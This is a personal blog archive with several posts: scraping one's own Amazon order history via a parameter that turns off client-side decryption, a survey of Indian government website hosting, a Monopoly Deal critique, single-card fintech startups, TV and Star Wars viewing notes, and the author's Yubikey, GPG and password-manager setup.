Nemo's Home

Amazon Order History Encryption Bypass

2021-05-14T00:00:00+00:00

The Amazon US website allows you to export your Order History easily by visiting the “Order History Reports” page. No such option seems to exist for the Amazon websites for other countries. I was trying to write a simple scraper for the Amazon India Order History Page to get the same data, and discovered something interesting: Amazon encrypts the Order history page, and decrypts it using client side cryptography¹. If you were to visit the page, and check the response HTML, you’d see something like this in the source code (fairly simplified):

// Define encrypted content in JS
var payload = {
  "kid": "b70014",
  "iv": "/HenfXwYrGrrw8ff",
  "ct": "Wt78pPcibe8HAdVtoJ8+E9EGwt4IQYNghBMubBy7Zy/..."
}
// The HTML div to be populated with the decrypted HTML
var elementId = "csd-encrypted-889C1D02..";
// if client side decryption library failed to load
if (!window.SiegeClientSideDecryption) {
  window.location.href = "?disableCsd=missing-library";
  return;
}
// Decrypt and populate the div
SiegeClientSideDecryption.decryptInElementWithId(
  elementId, payload, {callSource: "now"}
);

The easiest way to scrape with such hurdles is often to just run a complete browser to scrape the site. The browser runs the javascript code with the decryption routine so you can scrape the actual content. However, it is much slower, and wastes CPU cycles - I try to avoid it if I can.

I could have spent time to parse the encryption routine, extract the key and decrypt the payload. But I found a much simpler solution - Amazon offers an alternate URL which disables encryption. As a fallback, in case the decryption code fails, it adds a query parameter ?disableCsd=missing-library. That disables the server side encryption entirely.

So if you’re trying to scrape Amazon and stumped at the missing order history in the HTML, try visiting the following URLs instead:

Amazon also sets a cookie csd-key=disabled but I didn’t experiment with that much.

Request My Data

Another alternative to scraping is to request Amazon for your data. Check the Retail.OrderHistory CSV files in the data export. The export from amazon.com includes data for other countries as well. The feature is also available on other Amazon sites:

I’m hesitant to call this DRM, but it might qualify as such. ↩

Writing on books - Fantastic Beasts and Where to Find Them

2020-11-29T00:00:00+00:00

“Fantastic Beasts and Where to Find Them” is a curious book:

The in-universe book is written by Newt Scamander and was published in 1927.
The first edition of the companion book was published in 2001. This is apparently the 52nd in-universe edition with a foreword from Dumbledore and was released to the muggle world for charity.
The 2001 edition pretends to be Harry’s copy of the book as of the end of Harry’s 4th year at Hogwarts. As such it includes hand-written comments from the trio. (Yes, Hermione writes on books!)

However, with the release of the film of the same name in 2016 - a new edition was released with lots of changes:

6 new beasts that made an appearance in the film were added to the book¹:
- Hidebehind
- Hodag
- Horned Serpent
- Snallygaster
- Thunderbird
- Wampus cat
The hand-lettering was removed.
Dumbledore’s foreword is removed from the book, in favor of a in-universe foreword from Newt Scamander.
“About the Author” section changes Newt’s background. He no longer graduates from Hogwarts, just “leaves” it, as portrayed in the film.

All of these changes are meant to fix the inconsistencies in the book with the canon, however that also makes the book much less charming. I got myself a copy of the Hogwarts Library boxset a few years ago, which includes the newer edition of the book (Bloomsbury) - that means no witty comments from Ron.

Since it didn’t have the hand-lettering, I took it upon myself to fix that mistake. Thankfully, lists of all the comments in 2001 edition are available on the internet. The trickiest part was the “this book belongs to” page, which is missing from the newer edition. I ended up creating a faux-library card for that instead.

Here is what it looks like:

Ron plays hangman and loses.
Hermione writes on books!

Thanks to Bhavya for helping with the troll illustration.

I didn’t like the new additions, they sound less like a textbook and more like a transcript of what happened in the film. ↩

Analysing the Indian government cyberspace

2020-09-16T00:00:00+00:00

I recently did some work on analysing the Indian government cyberspace, thought I should document them somewhere outside of my Twitter¹.

List of GoI websites

I’d made a list of Indian government websites in Jan 2019:

I ran @18F /pulse on Indian Government websites to see how many of them support HTTPS. A quick summary:

Total Websites: 14183
Total Live Websites: 11710 (82%)
Websites with Valid HTTPS: 4753 (40% of all live websites)

Raw Dataset for now: docs.google.com/spreadsheets
— Nemo (@captn3m0) January 15, 2019

The dataset was from 2 sources:

GoI Directory
crt.sh (All certificates ending in .gov.in were used)

I re-ran the scripts to get an updated list (12842 domains), then tabulated them against the public-suffix² for each. There is a long-tail, and I’ve published results here. Here are the top public suffixes for Indian government sites:

Public Suffix	Domains
nic.in	2454
gov.in	7259
in	528
ac.in	490
com	568
co.in	171
org.in	168
edu.in	117
org	844
res.in	134
net.in	12
net	38

Sanskari Proxy

This was a long standing idea on my ideas repo:

A lot of Indian Government websites are inaccessible on the public internet, because they geo-fence it to within Indian Boundaries. The idea is to make a Indian Proxy service that specifically works only for the Geo-fenced Indian government websites.

For eg, if uidai.gov.in is inaccessible, hitting uidai.gov.sanskariproxy.in will get you the same result, proxied via our servers.

Since I’d made an updated list of GoI websites, this seemed easy enough. I realized that setting up uidai.gov.sanskariproxy.in would likely count as impersonation under the Indian law, so I did the next best thing: run an actual proxy. Here’s the announcement tweet:

Are you a security researcher outside India? Do you hate getting geoblocked to Indian government websites?

Well, I made a proxy for security researchers outside India to access Indian government websites without resorting to shady VPNs.
captn3m0/sanskari-proxy
— Nemo (@captn3m0) September 5, 2020

Project page is https://github.com/captn3m0/sanskari-proxy, and if you’d like to get access - please reach out.

Cyberspace Ownership

I’d planned to get a complete list of geoblocked websites next. While I’m progressing on this front, the results have been inconsistent/inaccurate so far. As an intermediate step, I’d made a list of IPs against every domain³, which looked like this:

Domain	IP Address
aavin.tn.gov.in	164.100.134.148
abnhpm.gov.in	14.143.233.34
agnii.gov.in	13.232.216.65
ap.gov.in	117.254.92.53
aponline.gov.in	125.16.9.130
appolice.gov.in	118.185.110.147
attendance.gov.in	164.100.166.114
cgg.gov.in	112.133.222.115

While running numerous nmap scans (and failing), I start checking the ASN⁴ for some of these IPs to see who was hosting each website - especially the ones I was finding were blocked.

I stumbled upon a bulk IP to ASN service by Cymru, ran all the IPs against it and published the results. Here’s the important graph:

As you can expect, NIC⁵ has the highest share, with NKN⁶, BSNL, and CtrlS following at roughly 5% each. There are a few other chart on the twitter thread, and the raw data is available here with interactive versions of each visualization.

What next?

I’m working on running and comparing connectivity scans to these IPs to get a better understanding of the geoblocking situation. There’s also some issues with the domain list, as it seems to be missing lots of domains - so more corrections are needed.

Twitter decided to suspend 12 different accounts I had access to recently - I’m starting to get wary of using Twitter for archival now. ↩
A “public suffix” is one under which Internet users can (or historically could) directly register names. For eg - nic.in or github.io. Mozilla manages the list at https://publicsuffix.org/. ↩
There are issues with this approach, since domains do resolve to multiple IPs. But this is okay for the rudimentary analysis I’ve been doing so far. ↩
Autonomous Systems (AS) is how the internet is sliced up and managed by different entities. Each AS (usually an ISP) is responsible for routing within its network, while announcing network routes on how it can be reached. ↩
The primary government office (under MeitY) that provides infrastructure and support for government IT services. ↩
National Knowledge Network is a multi-gigabit research and education network that provides a high speed network backbone for educational institutions in India. ↩

The game breaking Deal Breaker card

2020-06-24T00:00:00+00:00

I have a presentation I sometimes give about Monopoly being a terrible game¹. I usually end it by pointing the audience to Monopoly Deal, which I introduce it as “the only Monopoly edition you can enjoy”.

The advantages are obvious:

Much shorter game length.
No dice rolls.

Even if you lose badly on luck, you’ve only lost 15 minutes. While it is better than Monopoly, that isn’t to say it is a well designed game (6.3 on BoardGameGeek).

The one major dent in the otherwise decent game is the “Deal Breaker” card, which breaks the game. I’ve house-ruled the game since forever to keep the card out of the game, since it breaks the most important rule of game design:

Games should be fun²

Deal Breaker stops people from doing that. How? Read on.

A lot of metagaming discussion with friends resulted in the following observations:

The Deal Breaker is a very powerful card (It takes you 1/3rd of the way to a victory).
You can assume the single Deal Breaker card to be worth a complete set.
The best use of such a card is to win the game. Using it earlier means giving other players a chance to drag you down from 2->1 set. But if you use it to win the game, the game ends immediately.
Hence, Deal Breaker will always end up being the last card of the game.

If you are playing a game with the Deal Breaker card, you’d want to save it till the very end, and win the game with it. The only possible case for not winning is the other player having a “Just Say No” card, and playing it on the Deal Breaker to negate your move.

Ergo, the metagame converges to the following:

Any game with Deal Breaker will end up having the Deal Breaker as the last turn.
The only way to prevent someone else from winning with the Deal Breaker is to play a Just Say No on the Deal Breaker.
If you have a Just Say No card, you must save it till the end of the game for the Deal Breaker.

There are 2 Deal Breakers, and 3 Just Say Nos in the game. However, considering a single Deal Breaker is enough to win the game, and the chances of you getting a second of either card are fairly small - both the Deal Breaker and Just Say No cards will end up getting hoarded for the endgame.

What this results in is something that breaks the fundamental rule of game design:

Players are disincentivized from playing the Just Say No card.

As any Exploding Kittens player can confirm, playing a Just Say No card is one of the coolest moves in the game. It lets you stick it to the player who dares ask you for 8M³ rent. It lets you pretend you’re counting your money, and then pull out a trump card and feel awesome! By disincentivizing players from playing the coolest card in the game, the Deal Breaker card makes things less fun. And that breaks our “rule of fun”.

In fact, the mere existence of a Deal Breaker card changes the equation. Note that there may be cases where you lose with a Just Say No card because you were hoarding it for the eventual Deal Breaker (which might never come). Someone asks you for 4M rent, and you have to pay up despite having a Just Say No card, because you must save the damn card for when someone steals your set. There are a few rare exceptions, but the Deal Breaker creates too many plays where not playing the Just Say No is indeed the correct move.

So here is the more interesting corollary observation:

The mere existence of the Deal Breaker card breaks the game by making the Just Say No card unplayable and worthless.⁴

Hence, if you’re playing Monopoly Deal, please house-rule the Deal Breaker card and make it easier for everyone. Two easy ways are:

Remove the card from the game entirely.
Reduce the power of the game to be same as a Forced Deal, except let it break a set.

I have the slides here, but they don’t stand well on their own. ↩
Any game that eliminates players from the game breaks this rule. Popular examples are Monopoly and Mafia/Werewolf. Also see this amazing post on the biggest mistake that Guillotine makes (The “Callous Guard” card). ↩
Turns out, that there is no symbol in the unicode for Monopoly Money ↩
We decided Deal Breaker might make sense in 6+ player games with many more cards, where it might help even the playing grounds a bit for a losing player (much more likely) instead of helping the almost-winning-player score a victory. ↩

A survey of OneCardToRuleThemAll companies

2020-06-22T00:00:00+00:00

A lot of companies have come up with the idea for reducing all your cards into a single piece of plastic. Here’s a summary of all the ones I could find, and their fate. Beware: this field is very much a startup graveyard. The only remaining survivor seems to be Curve¹ but it’s also the first one that’s attempting this outside of US.

There seem to be a lot of challenges (regulatory, financial, and technical) before such a thing becomes reality. And there’s Apple/Samsung Pay as well. Here’s a summary of all the companies I could find in this space. If I’ve missed any, please let me know, and I’ll add them here.

Curve (2015-)

Curve allows you to spend from any of your accounts using just one card, clearing the clutter from your wallet and simplifying your finances.

Curve has raised a total of $74M at a valuation north of $250M, out of which £6M were from a crowdfunding campaign in 2019.
Their waitlist is at 800,000+ users.
Curve faced flak for failing to disclose its usage numbers (<100,000 monthly active users out of total 500,000) to crowdfund investors.
Only works with Visa/MasterCard. Used to work with Amex, but Curve has a history of working and being blocked by Amex repeatedly.
See this page for some details on how it works.

Coin (YC W13) (2012-2017)

Coin raised a total of $15.6M.
Shipped in 2015 April.
Acquired by Fitbit in May 2016.
Shutdown by Fitbit in Feb 2017.
Related: Google acquired FitBit in 2019 Nov.

Plastc (2014-2017)

Single dynamic card with e-Ink touchscreen. See obligatory launch video with fancy AR.
Crowdfunded $9M on pre-orders in October 2014.
Delayed launch to April 2016, and then again to September 2016.
Shut down and declared bankruptcy in April 2017.
Complete story via digg.com.

Stratos (2015-2015)

Was supposed to cost $95/year.
Announced May 2015.
Raised $6.63 million over three rounds of financing.
Ran out of money by December 2015.
Sold to Ciright One to avoid collapse.
Seems to be dead now.

Swyp (2014-2017)

Had a pre-order campaign in 2014.
Raised $5M from Khosla Ventures in 2017.
Tried to pivot in 2017, failed.
Offered customers a debit card with an app called Hoot in 2017 as an alternative to refunds. I don’t think the Hoot card ever materialized.
Tilt (Swyp’s payment processor) also ceased operations in 2017, due to unrelated reasons.
Swyp finally shut down in December 2017.

Final (YC W15) (2014-2017)

Final was with a credit card with a different number for every website. As a independent card, Final doesn’t exactly fit in this list, but it’s a very relevant and loved product.
Announced itself with a snazzy video in mid 2014
Raised $4M and launched in August 2016, but remained invite-only till the very end.
Final’s blog has some interesting content: A Request for Credit Cards program to build card-issuance backed businesses and the Payment card landscape for 2017.
Shut down in december 2017 and acquired by Goldman Sachs in an acqui-hire.

Indian Landscape

India hasn’t seen a true single-card app yet, but there have been lots of related attempts:

Infino promises a single-card, but it hasn’t launched yet. It had a public roadmap, but never launched and ultimately pivoted to a Coupon Aggregator called Meet Donut, which shut down.
IndusInd bank has tried a dual-chip debit+credit card. Union Bank has a similar card.
IndusInd has also tried an interactive credit card with 3 buttons.
FamPay, Fold, Niyo, OneCard, Donut🪦, vCard🪦, Slice ² and lots of other startups are doing co-branded issuance, but that’s not the same thing.

With the emergence of UPI, and low penetration rate of credit cards, I don’t see a market in India - but I’d love to be proven wrong.

Did I miss anything? Reach out and let me know.

Thanks to Harman for reviewing drafts of this, and PRL for getting me interested enough to document this.

Curve used to live on imaginecurve.com, then switched to curve.app and now to curve.com, which must have cost them millions. ↩
Unlike others on the list, vCard is entirely a virtual card, and supports UPI transfers from your credit limit. ↩

His Dark Materials Season 1 Readthrough

2020-06-07T00:00:00+00:00

A long time ago, I tried to do a readthrough for Game of Thrones (Book 1) alongside the first season. I managed to reach Episode 5, before I sped through the rest of the book, but I tried.

Trying something similar for His Dark Materials, which is a great series if you’re looking to watch something new. Instead of noting down Chapter/Book equivalence (like I tried last time), going to write down my thoughts here as I’m reading along. Spoiler Warning for the entire first season obviously.

Overall

The show is very tightly knit with the book with a few over-arching changes from the story-telling perspective:

You get to see other points-of-view, other than just Lyra. Helps establish what else is happening, especially in the other worlds.
A lot of infodumps are prevented, or better, broken down into multiple sessions.
The major change from the first book is ofcourse showing Will’s PoV and our earth.

Chapter 1

The opening scene with the great flood sets some context, but isn’t in the books.
The Master/Butler chat on the wine poisoining happens much later in the books.
There is a lot of foreshadowing around Lyra’s parentage that happens in the first 2 chapters that is entirely missed in the show.

Chapter 2

The entire Grumman’s skull and hunt sub-plot hasn’t shown up in the book so far (presumably because we only see Lyra’s PoV).
The party scene is very-well handled (with all the subtle changes for the better. Superb acting as well :)
The hiding-lyra-in-the-boat scene is merely given a passing mention in the book, but so well done in the show.

Chapter 3

Splitting Lyra’s parentage reveal (Coulter reveals her father) is a smart move in the show.
The show changes Lyra’s kidnappers from Turkish slavers to Gobblers.
The Alethiometer reveal happens with both Father Coram and John Fa in the book. The section also has a huge infodump, especially since it involves the parentage reveal. The show breaks it into 3: alethiometer reveal with Father Coram, a previous interrogation of Lyra with John Fa, and Lyra’s parentage reveal (mother) with Ma Costa.

Chapter 4

The one notable “not-in-the-book” scene is the Coulter’s meeting with Iofur.

Chapter 5

Interesting to note that the characters of Billy and Roger are fused in both the film and the TV adaptations.

Chapter 6

Lyra starts a fire in the books, but the show makes it more dramatic by destroying the machine.
The balloon ride covers a lot more in the books.

Learnings

Overall, the show has been nicely adapted so far, and I think there’s a few reasons:

The show barely messes with Lyra’s timeline. Important to ensure this to avoid creating cascading issues down the path.
Majority of the changes are either made on kill-able subplots, or side-plots that show us what’s going on elsewhere.
And finally, the show spends time on where the medium works best. The scaring scene in Chapter 2, for eg.

I’m still sad that the ghosts in the crypt don’t get to be seen, though.

Star Wars Beskar Viewing Order

2020-05-04T00:00:00+00:00

I tweeted out my recommended viewing order for Star Wars recently¹:

Happy #StarWarsDay folks. If you've somehow managed to avoid watching Star Wars, here's my recommended viewing order (No Spoilers, 1/n) pic.twitter.com/K70O4ydCB7
— Nemo (@captn3m0) May 4, 2020

Thought I should expand a bit on the what and why. Spoilers towards the end (marked). I also went ahead and named it:

The Beskar Order

Rogue One: A Star Wars Story
Star Wars: Episode IV - A New Hope.
Star Wars: Episode V - The Empire Returns
Star Wars: Episode VI - Return of the Jedi
The Mandalorian (S01E01-04)
Star Wars: Episode VII - The Force Awakens
The Mandalorian (S01E05-08)

If you’ve enjoyed the above, you should pick between the following 2 next:

If you liked the core Skywalker Saga (Episodes IV-VI), and want to explore Anakin’s origins - Go and watch the prequel trilogy (Episode I, II, III).
If you liked Force Awakens, you should go finish the sequels (Star Wars Episode VIII, IX)

In either case, I want to leave this as a choice to the viewer. The prequel trilogy has a lot of flaws. The Machete order famously drops an entire film, and it wasn’t even trying to make room. Go to the prequels if you want to explore the lore. On the flip side, if you liked how Disney handled Episode VII, and want to see closing arcs for the major characters, try the sequels. I wouldn’t recommend interleaving them - it doesn’t get you much and makes it confusing.

If you’re still here after finishing both of these (that makes for a total of 10 films and 1 season of telly) - you ought to explore for yourselves. Here’s suggestions depending on what you’d like:

Clone Wars (TV Series, 7 seasons): for exploring the franchise at a less grand scale. There’s an Essential viewing order, which covers all the major arcs and best episodes.
The Mandalorian (Season 2, Oct 2020): To find out what happens to Baby Yoda
Star Wars: Rebels (TV Series, 4 Seasons): If you want to explore new characters and like something Firefly-esque.

There are boardgames, RPGs, and some really great books in the franchise as well. Pick what you’d like to explore.

Inspiration

The classic Machete Order which does a lot of great things, by skipping a film, preserving tension and plot-twists. Also of note are the various fan-edits, of which I’ve only ever tried The Phantom Edit.

Rationale

I tried to optimize for a few things:

Fun while watching the series. So good stuff comes first, paired films etc, and intentionally including The Mandalorian.
Easy stoppage. In case you don’t like the series, you should be able to stop midway, and still have seen the important/best bits.
Sticking to chronological order in the stuff I picked (as much as possible). Sticking to chronology makes it easier to consume.
Total time. I don’t want to prescribe a “complete-viewing-order”, but rather a “starting point”.

(1) is easy to optimize for. (2/3) results in things getting thrown around a bit, and (4) means I leave out stuff that you should pick for later.

Why not include __?

This is not meant to be an exhaustive order, and I was optimizing for total time. Important mentions:

Solo: Not really essential viewing.
Star Wars: The Clone Wars: The film is terrible (5.9 on IMDB), because it wasn’t meant to be one.
Star Wars: The Clone Wars TV Series: I wanted to stick to the main saga, and its just too damn long to recommend casually in any viewing order.
Star Wars: Holiday Special: I still can’t bring myself to finish it. It isn’t even canon any more (Life Day is)
Legends/Resistance: Again, not essential viewing.

FAQ

Who is this for?: Recommended for first-time viewers. If you are doing a rewatch, I recommend following The Beskar Machete order.
Have you watched everything Star Wars?: I can’t even claim to have watched all 12 films, because I couldn’t finish The Clone Wars (movie). I’m still watching Clone Wars (TV series).
Why Beskar?: I wanted something that would work well with Machete, for the hybrid order. It also makes a point about The Mandalorian ² belonging in the order.
I don’t have this much time!: I’ve tried to optimize for viewing time already. If you wanna trim further - you’ll be left with just the original trilogy (Episode IV, V, VI). Alternatively, just watch The Mandalorian - it stands very well by itself.
Did you backdate this post while publishing?: Yes. I wrote it just a few days after May 4th, and thought it would be nice.

More Rationale (SPOILERS AHEAD)

SPOILERS FROM HERE ONWARDS FOR ALL 12 FILMS. READ AT YOUR OWN PERIL

Why start with Rogue One?

Rogue One is a great film, and I love how well it segues into A New Hope. Watching them both back-to-back makes for a great experience. You have this ragged group that has laid down their lives for just a memory chip - and you get to see that bloom into an entire saga. Finishing the original trilogy from there makes sense. The Machete order strongly recommends against starting with Rogue One, but I’ve tried it and it works.

Why not stick with the Machete order as well?

The Machete order goes (IV, V, II, III, VI), deciding to leave out Episode I, and wedging Episodes II, III before you see Return of the Jedi. I was optimizing for time here a bit, and I had to leave the prequels as “for-later” in order to make space for the remaining. If you’re doing a rewatch, and aren’t short on time - you can totally follow it. This is what it morphs into:³

Beskar Machete Order

Rogue One: A Star Wars Story
Star Wars: Episode IV - A New Hope
Star Wars: Episode V - The Empire Returns
Star Wars: Episiode II - Attack of the Clones
Star Wars: Episode III - Revenge of the Sith
Star Wars: Episode VI - Return of the Jedi
The Mandalorian (S01E01-04)
Star Wars: Episode VII - The Force Awakens
The Mandalorian (S01E05-08)
Star Wars: Episode VIII - The Last Jedi
Star Wars: Episode IX - The Rise of Skywalker

Why add the Mandalorian at all?

Because frankly - it is both a piece of art, and the best entry into the Star Wars canon in a long time. It also fits into chronological order just after Return of the Jedi - you see how the New Republic has been incompetent, and the ashes of the Empire. You get to experience the power vaccuum in the galaxy, which hopefully makes sense before jumping into The Force Awakens and rise of the First Order.

Why jump to Episode VII (The Force Awakens) instead of finishing The Mandalorian?

We jump a bit ahead (before finishing The Mandalorian) to “A Force Awakens”, getting to just the start of Rey’s story. This is the only “chronology break” in the order, but has no side-effects⁴. The reason for the jump (as opposed to finishing The Mandalorian first) is to have a switch in pace. While I love The Mandalorian, I think pacing it out makes it better.

Why keep Episode VII (The Force Awakens) but not the other sequels?

The best and the worst thing about The Force Awakens is that it is very much “Star Wars”. It doesn’t take any risks, sticks to the tropes, and more importantly - it closes mostly as a self-contained film. Yes, there are a few plot-hooks (Rey’s parentage, Luke, Finn’s coma), but given how badly they are resolved in the following films - it seems Disney didn’t have any better idea to the answers than the viewers. It also gives you a “tasting experience” of the sequels. The sequels have always been polarizing, and watching it gives you a better heading to make the choice b/w Prequels/Sequels later on in the order.

We close with The Mandalorian finale. The Mandalorian isn’t, strictly speaking, essential viewing. While there are hooks, it doesn’t really change anything of consequence to the main saga (at least not in Season 1). But frankly, it is so well made - you deserve to enjoy it. Just look at the trailer:

If you have feedback, send me a tweet. If you’re reading this in the future, note that this was written in May 2020 and could not include media yet to be published.

Happy Star Wars Day! ↩
Beskar is the Star Wars universe’s Vibranium, and features majorly in The Mandalorian as a minor plot device. ↩
The arguments against starting with Rogue One don’t even apply to rewatches, so we ignore the Machete Guideline to keep it to the end. ↩
In other words, watching The Force Awakens can’t alter the experience of watching the last few episodes of The Mandalorian season 1. ↩

My Setup: Passwords, 2FA, and Yubikeys

2020-01-04T00:00:00+00:00

I upgraded my encryption setup recently, so I thought I should write about it, just in case it is helpful to someone else. As a security professional, I have a different threat model from most folks, and as such my setup does involve a bit more complexity than what I’d recommend to everyone. But if you are an at-risk individual (journalist, person holding hundreds of bitcoins or other digital assets, activist) or if you are a linux user with a lot of free time - you might consider duplicating some of this.

I’ll discuss some of the other approaches I’ve considered, and my thought process around each choice I made. There are general recommendations at the bottom of the post.

Passwords

I used to be on LastPass till 2017¹, when I migrated to [pass][pass] (“the standard unix password manager”). With pass, each password lives inside of a gpg encrypted file whose filename is the title of the website or resource that requires the password.

pass automatically manages a git repository for you, which I sync against GitLab. The one downside of using pass is that the list of my domains is visible to my hosting provider. ² In the past, I’ve set this up against Keybase Encrypted Git (Keybase doesn’t get to see even the file list), and my own git-server (only I get to see it).

I don’t push it to GitHub, since most of my stuff lives on GitHub anyway, and I didn’t want to add my passwords there as well. GitLab uptime is decent enough for my usecase³. Finally, my GitLab account is fairly locked down with:

zero integrations or third-party apps
no active personal tokens
social signin disabled
only yubikey SSH key configured

Mobile Passwords

There are 2 primary considerations I have:

Using pass involves GPG keys, and I can’t use hardware GPG keys on my current device (iPhone SE).
I don’t want to sync all my passwords to my phone. I have a limited number of applications on my device, and syncing all passwords doesn’t make sense.

For the first issue, I am forced to use a PGP key in software on [passforios][passforios]. If you are on Android, take a look at [OpenKeychain][okc], and Fidesmo/Yubikey NFC.

For the second issue, I use pass cp, and the .gpg-id file, which allows me to maintain a mobile-sync directory inside my pass git repository encrypted against a different key. From the pass documentation:

`~/.password-store/.gpg-id`

Contains the default gpg key identification used for encryption and decryption. Multiple gpg keys may be specified in this file, one per line. If this file exists in any sub directories, passwords inside those sub directories are encrypted using those keys. This should be set using the init command.

My ~/.password-store/mobile-sync/.gpg-id file holds 2 keys: My main encryption key, and the key I’ve configured on my phone.

Unfortunately, I haven’t gotten it working well as a git submodule, so I have a helper script that copies the encrypted password files from mobile-sync subdirectory to a different repository (mobile-passwords.git). The script is just 2 lines:

cp -r ~/.password-store/mobile-sync/*.gpg .
git-sync

It updates the git repository, and runs a sync to push any local changes to my mobile-passwords repository. I can pull that on my passforios application. I could also clone the entire repo, but the iOS app doesn’t work nicely with a single-subdirectory approach.

GPG

pass relies on GPG, and as such I require a strong key setup. I have the following:

2xYubikey 4 (Doesn’t have NFC)
Fidesmo Smartcard, currently unused

Both the Yubikeys are configured against my GPG Encryption key. I carry one of the Yubikeys on my keyring with me. The backup Yubikey stays at my home.

I followed this guide while configuring the same. As of now, switching between keys is not very user-friendly, but future GnuPG versions plan to fix it. The Yubikey holds:

An encryption key
A signing key
An authentication key

I keep a copy of all these keys using paperkey as per the same guide. I have a subkey backup as well, since Yubikeys are known to fail⁴.

SSH

The Authentication key in my Yubikey is configured for SSH. I just need to ensure that my GPG agent is configured for SSH as well:

export GPG_TTY="$(tty)"
export SSH_AUTH_SOCK=$(gpgconf --list-dirs agent-ssh-socket)
gpgconf --launch gpg-agent

U2F

U2F lets me use a physical key as my second-factor on supported websites (as an alternative to SMS/TOTP). I configure both of my Yubikeys for U2F wherever possible (Twitter/AWS are notable exceptions and only support a single key). U2F support for [OpenSSH][ssh-u2f] is coming soon. So you can soon authenticate to your server with the Yubikey+PIN, and finish the 2FA with U2F by tapping the key⁵.

Root-of-Identity

For most people, the root of identity comes down to ownership of their email address. As such, it is very often the juiciest target for most attackers. I run my mail against Migadu, a privacy friendly swiss email-hosting service. They provide me a management layer for managing my domains which uses my GMail account. (See FAQ for why). I also have 2FA (TOTP only) configured on the Migadu management setup.

The domain is currently registered at a Indian registrar (which doesn’t offer U2F, but I do have TOTP configured). I would have moved this to CloudFlare, but CloudFlare doesn’t support the .in TLD yet.⁶

The email address used for registring the domain again is my GMail. My DNS is configured on CloudFlare, which again uses my GMail and has appropriate 2FA configured. (It doesn’t support U2F). So here’s the list of critical providers:

Provider	What can an attacker do	Auth	2FA
Regisrar/Mitsu	Change my nameserver, read any future email, reset passwords	GMail/Password	TOTP
DNS/CloudFlare	Change my MX records, read any future emails, reset passwords	GMail/Password	TOTP
Email/Migadu	Reset my email password, read my current emails, reset passwords	GMail/Password	TOTP
GMail	Reset passwords for the above 3 accounts	Email/Password	U2F

As you can see, I end up trusting GMail a lot here.

Recovery/Backup codes and Security Questions

I use randomly generated UUIDs as answers to security questions. Currently, I’m storing these for various services within the same password store. As it stands, I can’t get access to my password OR recovery token without my Yubikey and PIN. The access Matrix looks like this:

What	Physical Access	Additional Authentication
Password	Yubikey	PIN
U2F-2FA	Yubikey	Physical touch
TOTP	Phone	TouchID
Recovery Code	Yubikey	PIN
Security Question answers	Yubikey	PIN

Failure Scenarios

There are lots of failure scenarios with such a setup, and while I’ve got a pretty spotless record of not getting hacked - I’m not immune to screwups. Here’s all the bad things that can happen:

Yubikey failures

If my Yubikey fails (or if I forget its PIN), I can’t access passwords on my device. I still have access to commonly used passwords and my mail on my phone. My backup Yubikey is kept safely at my home. If I lose both, I have the paperkey backup at home (which I should store elsewhere).

Device failures

I have a current version of the password repository against 3 PCs, and a partial version in my mobile. If all these 4 devices fail at once, I can still clone a fresh version of the repository with my YubiKey (I would still have GitLab SSH access). I might need to prepare better for this though, since configuring GPG-SSH might not always be easy during an incident.

As a alternate scenario, my phone GPG key does have my GitLab password, so I can clone the repo over HTTPS (with password) if needed.

Circular dependency against GitLab

My GitLab password is randomly generated and stored in the same password store on GitLab. That is not too big of an issue, because I don’t need the GitLab password anymore to clone my passwords repo, just my Yubikey (for SSH).

Lost Key

If I lose my key, the GPG card contains public info, including my email address, which can be used to contact me. I have a [Tile bluetooth tracker][tile] on my keychain to make it easier for me to find it.

Malware

A hardware key doesn’t protect you from all attacks. At the end of the day, my passwords must be decrypted by the key and passed unencrypted back to my browser (or editor). pass for eg, doesn’t protect against memory scraping attacks. If I edit a password on an infected machine, it gets that password.

If my browser has a malicious extension, it already has keys to the kingdom. But if I then log into a website, it does get access to that password additionaly.

xkcd 1200 famously illustrates this:

A password vault protected by a hardware key protects against some attacks:

A malicious extension can’t sniff my vault passphrase, since I don’t have one
The key can’t be exfiltrated from hardware.

However, a malware can connect to my authenticated GPG socket, and start decrypting things. To prevent against that, I run my Yubikey in “touch-only” mode, so it requires a “physical touch” before it actually does anything, even if the PIN is cached. Customizability is dependent on your Yubikey model. But remember the xkcd warning - if I have a malware running on my device, it is pretty much game over anyway. pass doesn’t prevent against memory scraping attacks, and actually uses /dev/shm to store the temporary plain-text files containing passwords. Ultimately, your identity is as secure as the device you trust it with.

Improvements

If you have any suggestions for any of the below, I’m happy to hear them.

Travel Plans

Since my backup key stays at home, how do I deal with long-term travel? This is something I’m still figuring out. Do I take my backup Yubikey on my longer-travels? Or should I setup a third-key before I do that? Chances of me losing both the keys together are quite high, so I’m trying to avoid that.

Domain Ownership

I’d like to transfer my domain to a registrar that supports U2F, likely Namecheap since I already own some domains there⁷. If you use CloudFlare, they should roll out U2F support soon.

2FA Recovery Guides

I wish more organizations published what they consider as valid 2FA recovery mechanisms. GitHub supports 2FA recovery by proof of SSH keys or Personal Tokens; Migadu just needs a few domain names from your account, and lots of services require proof-of-identity.

A lot of this is undocumented, and I wish organizations were more public about this so users can take appropriate measures and understand their risk better.

Fidesmo Card

I’m planning to configure my Fidesmo card against my existing GPG/SSH key, so it stays in my wallet to improve redundancy. Unfortunately, it is not supported on iOS, so I plan to get a NFC reader/writer and test that out. This also helps with travel plans a bit, since I’m less likely to lose my wallet anecdotally(which also has [a bluetooth tracker][slim]).

U2F on iPhone

U2F support on Mobile Safari is non-existent. Brave recently added support for the upcoming Yubikey 5Ci, which supports both USB-C and lightning. However, this requires a special Yubikey SDK, which breaks the idea of U2F being interoperable. The 5Ci is also quite costly at $70. I don’t know of any application that is actually supporting GPG-over-Yubikey-over-lightning.

Compare this to Android where NFC based smartcards or Yubikeys just work. I’d like that to happen with iPhones.

Full Disk Encryption using a Yubikey

It is possible to configure Full Disk Encryption with Yubikeys, but I haven’t tried it yet.

2FA on my email account

Migadu currently does not support 2FA on webmail access, just on manage.migadu.com. This is very unfortunate, but I’m told this is planned soon (January 2020).

Recovery/Backup codes and Security Questions

My current setup of saving recovery codes alongside passwords isn’t optimal, but I don’t have a better way either. I’ve considered keeping my recovery codes on a alternate password store (such as bitwarden, or keypassX), but I’ll have to memorize the password, and setup a separate 2FA for it to be truly fault-tolerant.

FAQ

Why do you have stuff configured on your GMail? Aren’t you anti-Google?

Despite all the flak that Google gets for privacy, their security team is pretty awesome. Your account is pretty much unhackable once you are enrolled into their Advanced Protection Program. The few security-sensitive places where I use it are:

Domain Registration
Email Management
DNS Configuration

Everywhere else, I use my actual domain (captnemo.in) to ensure nothing else routes over GMail. Using GMail for the above 3 ensures that I don’t have a circular dependency. If I were to lose my main email password, I can recover via multiple ways:

Change DNS to another email provider.
